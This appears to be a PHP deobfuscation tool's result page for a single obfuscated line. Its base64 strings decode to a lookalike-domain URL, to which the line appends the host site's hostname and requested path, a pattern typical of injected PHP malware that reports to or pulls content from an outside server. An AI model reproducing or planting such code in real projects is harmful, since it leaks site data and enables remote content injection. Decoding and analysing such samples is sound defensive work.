Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$endcontent = base64_decode('aHR0cDovL3d3dy5nb29nbGVqYXZhc2NyaXB0LmNvbS9hcGkucGhwP3NlcnZlc..
Decoded Output download
<? $endcontent = base64_decode('aHR0cDovL3d3dy5nb29nbGVqYXZhc2NyaXB0LmNvbS9hcGkucGhwP3NlcnZlcj0=') . $_SERVER['HTTP_HOST'] . base64_decode('JnBhZ2U9') . $_SERVER['REQUEST_URI']; ?>
Did this file decode correctly?
Original Code
$endcontent = base64_decode('aHR0cDovL3d3dy5nb29nbGVqYXZhc2NyaXB0LmNvbS9hcGkucGhwP3NlcnZlcj0=') . $_SERVER['HTTP_HOST'] . base64_decode('JnBhZ2U9') . $_SERVER['REQUEST_URI'];
Function Calls
base64_decode | 2 |
Stats
MD5 | 9ef91959e0fb59f9b16da792c423637e |
Eval Count | 0 |
Decode Time | 96 ms |